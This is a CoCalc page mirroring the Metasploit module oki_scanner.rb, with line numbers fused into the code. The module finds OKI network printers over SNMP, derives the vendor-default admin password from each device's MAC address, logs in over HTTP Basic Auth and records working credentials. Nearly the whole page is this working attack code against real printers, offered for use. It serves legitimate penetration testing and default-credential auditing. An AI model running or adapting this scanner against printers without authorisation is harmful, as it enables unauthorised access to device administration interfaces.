CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/misc/oki_scanner.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45# TODO: Split this module into two separate SNMP and HTTP modules.67class MetasploitModule < Msf::Auxiliary8include Msf::Exploit::Remote::SNMPClient9include Msf::Auxiliary::Scanner10include Msf::Auxiliary::Report1112def initialize(info={})13super(update_info(info,14'Name' => 'OKI Printer Default Login Credential Scanner',15'Description' => %q{16This module scans for OKI printers via SNMP, then tries to connect to found devices17with vendor default administrator credentials via HTTP authentication. By default, OKI18network printers use the last six digits of the MAC as admin password.19},20'Author' => 'antr6X <anthr6x[at]gmail.com>',21'License' => MSF_LICENSE22))2324register_options(25[26OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),27OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])28])2930deregister_options('RPORT', 'VHOST')31end3233def cleanup34datastore['RPORT'] = @org_rport35end3637def report_cred(opts)38service_data = {39address: opts[:ip],40port: opts[:port],41service_name: opts[:service_name],42protocol: 'tcp',43workspace_id: myworkspace_id44}4546credential_data = {47origin_type: :service,48module_fullname: fullname,49username: opts[:user],50private_data: opts[:password],51private_type: :password52}.merge(service_data)5354login_data = {55last_attempted_at: Time.now,56core: create_credential(credential_data),57status: Metasploit::Model::Login::Status::SUCCESSFUL,58proof: opts[:proof]59}.merge(service_data)6061create_credential_login(login_data)62end6364def run_host(ip)65@org_rport = datastore['RPORT']66datastore['RPORT'] = datastore['SNMPPORT']6768index_page = "index_ad.htm"69auth_req_page = "status_toc_ad.htm"70snmp = connect_snmp()7172snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac|73last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase74first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase7576# check if it is a OKI77# OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt78if first_six == "002536" || first_six == "008087" || first_six == "002536"79sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s80print_status("Found: #{sys_name}")81print_status("Trying credential: admin/#{last_six}")8283tcp = Rex::Socket::Tcp.create(84'PeerHost' => rhost,85'PeerPort' => datastore['HTTPPORT'],86'Context' =>87{88'Msf'=>framework,89'MsfExploit'=>self90}91)9293auth = Rex::Text.encode_base64("admin:#{last_six}")9495http_data = "GET /#{auth_req_page} HTTP/1.1\r\n"96http_data << "Referer: http://#{ip}/#{index_page}\r\n"97http_data << "Authorization: Basic #{auth}\r\n\r\n"9899tcp.put(http_data)100data = tcp.recv(12)101102response = "#{data[9..11]}"103104case response105when "200"106print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")107report_cred(108ip: rhost,109port: datastore['HTTPPORT'],110service_name: 'http',111user: 'admin',112password: last_six,113proof: response.inspect114)115when "401"116print_error("Default credentials failed")117when "404"118print_status("Page not found, try credential manually: admin/#{last_six}")119else120print_status("Unexpected message")121end122123disconnect()124end125end126127# No need to make noise about timeouts128rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion129rescue ::Interrupt130raise $!131rescue ::Exception => e132print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")133ensure134disconnect_snmp135end136end137138139